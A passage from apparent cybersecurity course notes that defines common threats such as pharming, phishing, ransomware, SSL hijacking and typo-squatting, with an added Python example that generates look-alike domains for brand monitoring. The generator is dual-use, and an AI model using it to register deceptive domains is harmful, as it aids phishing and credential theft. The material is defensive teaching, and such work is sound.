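Lowercase letters and digits up to three characters give under fifty thousand candidates; twelve characters drawn from the 95 printable ASCII characters give more than 5 x 10^23, which is why brute force is only used for short or structured passwords and dictionary attacks with mangling rules do the bulk of real cracking.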

Pharming
Pharming is a technique used to redirect traffic from a legitimate website to a
malicious one. This deception can be achieved by modifying the user’s system settings
(for example the local hosts file or the DNS resolver configuration) or by exploiting
vulnerabilities in domain name system (DNS) server software, which is responsible
for resolving domain names into IP addresses. Contrary to typo-squatting
(see below), where a user mistypes a website address and is redirected to an
illegitimate website, pharming can redirect a user who properly types the URL. At a
quick glance, the illegitimate website may appear to be the legitimate website and can
be used to deliver malware and acquire personally identifiable or other sensitive
information.

Phishing, Spoofing, Spear-Phishing, and Whaling

Phishing is a common method by which threat actors disguise themselves as a
trustworthy entity with the intent of luring a large number of recipients into providing
information, such as login credentials, banking information, and other personally
identifiable information. Phishing is an example of a social engineering technique and
is mainly conducted through spoofed email and text messages. Users become victims
when they open malicious attachments or click on embedded links.
Spoofing is the act of masking or forging a website, email address, or phone number
to appear as if it originates from a trusted source. After receiving a phishing message,
the victim can be enticed into giving away personal, financial, or other sensitive
information or clicking on a link or attachment, which can infect a device with
malware.
Spear-phishing occurs when a cyber threat actor sends a personally tailored
phishing message to a more precisely selected set of recipients or even a single
recipient. Spear-phishing relies on social engineering, using details that make the
message believable to the victim as originating from a trusted source.
Whaling refers to spear-phishing targeted at senior executives or other high-profile
recipients with privileged access and authority.

Ransomware
Ransomware is malicious software that, in many cases, restricts access to a computer
or a device and its data by encrypting its content and demanding that a ransom be
paid, usually via a cryptocurrency such as bitcoin, in order for the victim to regain
access to systems and information. Ransomware can also lock systems in various ways
without the use of encryption, disrupting device performance. Actors may threaten to
expose sensitive, personal, or embarrassing information unless a ransom is paid.
Ransomware is typically installed using a trojan or a worm deployed via phishing or
by visiting a compromised website.

Rootkit
A rootkit is a malicious application that is designed to covertly provide a threat actor
with “root” or administrative privileged access to software and systems on a user’s
device. A rootkit provides full control, including the ability to modify software used
to detect malware. Rootkit installation can be achieved in many ways, including
through password cracking, social engineering, and leveraging a bug or design flaw
that can grant privileged access to a user’s system or device.

Spyware
Spyware is malicious software used to track a user’s digital actions and information
with or without the user’s knowledge or consent. Spyware can be used for many
activities, including keystroke logging, accessing the microphone and webcam,
monitoring user activity and surfing habits, and capturing usernames and passwords.

SSL Hijacking
Secure Sockets Layer (SSL) hijacking is a technique by which a threat actor is able to
intercept and redirect an unsecure connection between a victim and a server that is
trying to establish a secure connection. The threat actor then holds the secure
connection to the intended website itself while keeping the victim on an unencrypted
connection, which enables them to read and alter the communication without the
victim’s knowledge (see man-in-the-middle above). SSL hijacking is not about
breaking the security provided by SSL/TLS; rather, it inserts a compromised bridge
between the non-encrypted and encrypted parts of a communication, so the victim's
browser never sees an HTTPS connection to the real site. This is what HTTP Strict
Transport Security (HSTS) counters: a browser that has seen a site's HSTS header
refuses to fall back to plain HTTP for it, removing the unencrypted leg the attacker
relies on.

Typo-Squatting
Typo-squatting is a technique by which a threat actor registers domain names that
have very similar spelling to and can be easily confused with a legitimate domain
address. Typo-squatting is also known as URL hijacking and enables a threat actor to
redirect a user who incorrectly typed a website address to an alternative look-alike
domain under the actor’s control. The new domain can then deliver malware and
acquire personally identifiable or other sensitive information. Luring a victim to a
hijacked URL can also be achieved through phishing techniques.
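Defenders routinely generate the look-alike domains an actor might register for their own brand, and then watch certificate transparency logs, new registrations and their own mail flow for them. The following added example (not from the notes) does the generation side for one domain and checks an observed domain against a protected one. The keyboard-neighbour and look-alike character tables are small illustrative subsets, and the domains are constructed.

```python
"""Added example (not from the notes): generating typo-squat candidates for
a domain and checking an observed domain against a protected one. The
keyboard-neighbour and look-alike tables are small illustrative subsets."""

# QWERTY neighbours (subset) for fat-finger substitutions.
NEIGHBOURS = {"a": "qwsz", "e": "wrsd", "o": "iplk", "i": "uojk",
              "m": "njk", "l": "kop", "p": "ol", "x": "zsdc"}
# Sequences that look like the canonical letter at a glance (subset).
HOMOGLYPHS = {"l": ("1",), "i": ("1",), "o": ("0",), "e": ("3",), "a": ("4",),
              "s": ("5",), "m": ("rn",), "w": ("vv",)}


def split_domain(domain: str):
    """'example.co.ke' -> ('example', 'co.ke'); the registrable label comes first."""
    name, _, rest = domain.partition(".")
    return name, rest


def typo_variants(domain: str) -> set:
    """Candidates an actor might register: omission, doubling, transposition,
    neighbouring-key and look-alike substitution of one character."""
    name, rest = split_domain(domain)
    out = set()
    for i, ch in enumerate(name):
        out.add(name[:i] + name[i + 1:])                        # exmple
        out.add(name[:i] + ch + ch + name[i + 1:])              # exaample
        if i + 1 < len(name):
            out.add(name[:i] + name[i + 1] + ch + name[i + 2:])  # exmaple
        for sub in list(NEIGHBOURS.get(ch, "")) + list(HOMOGLYPHS.get(ch, ())):
            out.add(name[:i] + sub + name[i + 1:])              # exsmple, examp1e, exarnple
    out.discard(name)
    return {v + "." + rest for v in out}


def normalise(name: str) -> str:
    """Fold look-alike sequences back to the canonical letter before comparing."""
    for canonical, alts in HOMOGLYPHS.items():
        for alt in alts:
            name = name.replace(alt, canonical)
    return name


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(candidate: str, protected: str, max_distance: int = 1) -> bool:
    """Flag a domain that is the protected name under another TLD, is within
    max_distance edits after look-alike folding, or is a generated typo variant."""
    if candidate == protected:
        return False
    c_name, _ = split_domain(candidate)
    p_name, _ = split_domain(protected)
    if c_name == p_name:
        return True
    if edit_distance(normalise(c_name), normalise(p_name)) <= max_distance:
        return True
    return candidate in typo_variants(protected)


if __name__ == "__main__":
    variants = typo_variants("example.com")
    print(len(variants), "candidates, e.g.", sorted(variants)[:8])
    for seen in ["exarnple.com", "examp1e.com", "exmaple.com", "example.co", "google.com"]:
        print(f"{seen:16} look-alike: {is_lookalike(seen, 'example.com')}")
```

The folding step matters more than the edit distance: "exarnple" is two edits from "example" and would pass a distance-1 rule, but after "rn" is folded to "m" the names are identical. A transposition such as "exmaple" is also two Levenshtein edits, which is why the check falls back to the generated variant set for that case.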

Virus, Worm, Payload and Trojan

Malware is commonly delivered through the use of viruses, worms, and trojans, with
far-reaching consequences.
A virus is an executable, self-replicating program that inserts its own code into
legitimate programs with the objective of damaging the host computer (e.g., deleting
files and programs, corrupting storage and operating systems). A virus needs a host
program or file, and usually a user action, to spread.
In its simplest form, a worm is a computer program meant to self-replicate and spread
to other computers on its own, typically over the network by exploiting a vulnerability
in the target, draining system and network resources as it does so.
Additionally, just like a virus, a worm can carry code that damages its host. Such code
is referred to as a payload (e.g., the file-encryption routine of ransomware, or the
installation of a system backdoor that enables remote access).
A trojan is a malicious program disguised as or embedded within legitimate software
that has similar objectives to viruses and worms but, unlike either of them, does not
replicate or propagate on its own.

Wi-Fi Eavesdropping
Wi-Fi eavesdropping is when a threat actor installs what looks like a legitimate Wi-Fi
access point in a public area. Once users connect to such an access point, often referred
to as a malicious hotspot or a rogue access point, they fall victim to man-in-the-middle
(MITM). Such activity allows a threat actor to monitor communications and to acquire
personally identifiable or other sensitive information.

Wiper
A wiper is malware designed to completely wipe the hard drive of infected devices.

Zero-Day Vulnerabilities and Zero-Day Exploits

Unmitigated vulnerabilities that are not in the public domain and are known only to a
few people are referred to as zero-day vulnerabilities; the name reflects that the
vendor has had zero days to produce a fix. An exploit against a zero-day vulnerability
is called a zero-day exploit. Because no patch exists, defenders can only limit the
damage with compensating controls such as least privilege, network segmentation
and monitoring.

Types of vulnerabilities, their causes, and cybersecurity examples:

Technical: errors in design, implementation, placement or configuration.
Examples: coding errors; inadequate passwords; open network ports; lack of monitoring.

Process: errors in operation.
Examples: failure to monitor logs; failure to patch software.

Organizational: errors in management, decision-making, planning, or ignorance.
Examples: lack of policies; lack of awareness; failure to implement controls.

Emergent: interactions between, or changes in, environments.
Examples: cross-organizational failures; interoperability errors; implementing new technology.
